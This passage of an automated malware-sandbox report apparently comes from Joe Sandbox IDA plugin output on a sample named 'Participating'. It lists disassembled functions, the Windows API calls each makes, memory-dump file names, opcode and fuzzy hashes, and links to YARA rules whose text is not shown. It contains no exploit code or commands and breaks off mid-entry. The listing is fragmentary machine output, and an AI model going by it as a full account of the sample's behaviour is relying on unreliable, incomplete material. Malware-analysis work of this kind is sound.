                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5e3b377be60fb47c9db303fdbca562e1af13199fca60009bb6ad9eb5b3e56ee6
                                                                                                                                                                                                                                                                  • Instruction ID: 3e94dd77893102284399ba9f9dc842d64e7ec8db1ba8662d4e2a0a380a57e3fd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3b377be60fb47c9db303fdbca562e1af13199fca60009bb6ad9eb5b3e56ee6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D719AB6911340CEC7A8EF6AAD6967A3AF1BB58304340872AA109C73A1EB3055419F74
                                                                                                                                                                                                                                                                  Function 00CFFCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00CE6299
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00CFFD36
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CFFD45
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D3FE33
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                  • Opcode ID: 06b23724761f89a1d107e417eae55479732f4f64bec1909202ac94f506bb34f3
                                                                                                                                                                                                                                                                  • Instruction ID: 3351020bc2796acc32e1e53b6cc12459f9b42c170ae7d9ba2d4a2eaa6a08d74e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06b23724761f89a1d107e417eae55479732f4f64bec1909202ac94f506bb34f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12318671904348AFDB628F24D8557E7BBEC9F12308F1404ADE6DA97241D3745A85CB61
                                                                                                                                                                                                                                                                  Function 00D18A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,00D1894C,?,00DA9CE8,0000000C), ref: 00D18A84
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00D1894C,?,00DA9CE8,0000000C), ref: 00D18A8E
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D18AB9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1cdeae812c0318bb5d2d346a268bcf3d5145ce7e5d0fb84c504e5c36801f4435
                                                                                                                                                                                                                                                                  • Instruction ID: a14b089c2d31206cce779a250d8c246a980f6ff0155c73354c0f0fc084066b03
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cdeae812c0318bb5d2d346a268bcf3d5145ce7e5d0fb84c504e5c36801f4435
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F01E533A05260BBC724A234B8867FA67459F81734F3D021AF8149B2D2DF2589C1A5B0
                                                                                                                                                                                                                                                                  Function 00D1970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00D197BA,FF8BC369,00000000,00000002,00000000), ref: 00D19744
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00D197BA,FF8BC369,00000000,00000002,00000000,?,00D15ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00D06F41), ref: 00D1974E
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D19755
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                  • Opcode ID: df86d5c3e50c19905c64fd37e6ea3140e2d373f1efadc18157ef853a95b2a8af
                                                                                                                                                                                                                                                                  • Instruction ID: fa610dea3068a29e35230ba28b9352a069af2696c713739603b962ea45f1f915
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df86d5c3e50c19905c64fd37e6ea3140e2d373f1efadc18157ef853a95b2a8af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4201F932620214BBCB159F99EC159AE772AEF85330B380205F815972D0EA31DD81C7B0
                                                                                                                                                                                                                                                                  Function 00CEF238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00CEF27B
                                                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00CEF289
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CEF29F
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00CEF2B1
                                                                                                                                                                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00D332D8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5d80b8b6e4ae1ef4aa5544ceb6cd9b6ccc16b67f579b392b979c8eeb486674c8
                                                                                                                                                                                                                                                                  • Instruction ID: 430ba525a2ad38ed081532a84f76760b8c3d86a6429f79152eed9b86077502e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d80b8b6e4ae1ef4aa5544ceb6cd9b6ccc16b67f579b392b979c8eeb486674c8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BF05E35204384DBEB748BA1CC4AFEA33ADEF84310F504928E25EC31D0EB7495888B36
                                                                                                                                                                                                                                                                  Function 00CF2B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00CF3006
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                  • String ID: CALL
                                                                                                                                                                                                                                                                  • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                  • Opcode ID: 59b24c8b82c8c3fa5dc5a4e55a4eb9afe33551416611b614de45778d572c4e52
                                                                                                                                                                                                                                                                  • Instruction ID: 13cb534747701be791bb47c7591ab21556a43f8c23c055b674c83f883ac7be99
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59b24c8b82c8c3fa5dc5a4e55a4eb9afe33551416611b614de45778d572c4e52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 432279B0608645DFC764CF24C880B2ABBF1BF88314F24895DF59A8B3A1D771E945DB62
                                                                                                                                                                                                                                                                  Function 00CF1990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 72dd24b25d634908c1691eab2d43d0a06236f02d4c76a1080bee331727cd79a6
                                                                                                                                                                                                                                                                  • Instruction ID: 4a9eb33af7ac2c7a58206a0ecf0b6d1af7dd12f009bd9fcd7137f4ba5d046a3c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72dd24b25d634908c1691eab2d43d0a06236f02d4c76a1080bee331727cd79a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B32BE70A00209EFCB20DF55C891BBEB7B4FF14314F188558E955AB2A1E771EE44DBA2
                                                                                                                                                                                                                                                                  Function 00CE3A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00D2413B
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00CE3A76
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                                                  • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                  • Opcode ID: c93880b1cf02b6dd6c78ad52940aca2140ebd5b196bf2233c9e054332d5e14bc
                                                                                                                                                                                                                                                                  • Instruction ID: 98cbe59b3282e0450c1dfde3c7bd7fa5cf641943a323cf80f22d5c1f91295a38
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c93880b1cf02b6dd6c78ad52940aca2140ebd5b196bf2233c9e054332d5e14bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22219071A002989BDB11DF95DC09BEE7BF8AF49304F008019E549A7381DBF59A899FB1
                                                                                                                                                                                                                                                                  Function 00CE396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CE3A3C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3b664799b6898f6f8e7d8f4b88a66856847308a938888329db6b509496e8d7e0
                                                                                                                                                                                                                                                                  • Instruction ID: eb6320b18fd21982665b4ce0d827fc4dc16d4c0baba3086159b6414ab7bf2576
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b664799b6898f6f8e7d8f4b88a66856847308a938888329db6b509496e8d7e0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13317F71504341CFD321DF65D8887A7BBE8FB48318F00092EE69987341E775AA84CB62
                                                                                                                                                                                                                                                                  Function 00CE331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsThemeActive.UXTHEME ref: 00CE333D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00CE32FB
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00CE3312
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00CE3368,?), ref: 00CE33BB
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00CE3368,?), ref: 00CE33CE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00DB2418,00DB2400,?,?,?,?,?,?,00CE3368,?), ref: 00CE343A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00CE34BB
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00CE3377
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6f8a9a46663f70f41c792d63038b50c63093ec6af0e9889ebe40d5db25db6cf6
                                                                                                                                                                                                                                                                  • Instruction ID: 8e7289cc48a30277c3229daee8bf5eb1ea5e09799479fe11c3f1570df80c4989
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f8a9a46663f70f41c792d63038b50c63093ec6af0e9889ebe40d5db25db6cf6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F03A32554384DFE711AB61FC0EB3537E0AB00719F044A19BA09CA3E2DBBAA1919B74
                                                                                                                                                                                                                                                                  Function 00CFFFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 252777609-0
                                                                                                                                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                  • Instruction ID: a3681b6e6d047d3cd199e0b1e300fbd3f5cd40fc9f91fd68af18a068cd97e54b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1931C070A00105EBC718CF58D490B69FBA6FB49300F2886A5E44DCB296D732EDC1CBE0
                                                                                                                                                                                                                                                                  Function 00CECAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00CECEEE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                  • Opcode ID: d740edf8857930392c970b869261021554d2401452ebffd8892c1a6e70595818
                                                                                                                                                                                                                                                                  • Instruction ID: a6df6f9929c256070f5736f75ec0e6e85aa5b0af98ceae7741dcb27362cccc82
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d740edf8857930392c970b869261021554d2401452ebffd8892c1a6e70595818
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A32B175A00289DFCB20CF59C885ABEB7B5FF44350F288059E916AB351C735EE42DB61
                                                                                                                                                                                                                                                                  Function 00D67AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7e1a345f7e16b2dfdc87c7b6d2043929f31e21db98391d485d7bda4e4ed1bff4
                                                                                                                                                                                                                                                                  • Instruction ID: d6e5c60ac25a5680645af893c3d6453f1c57017c388f2ff77b14beeff49b0c81
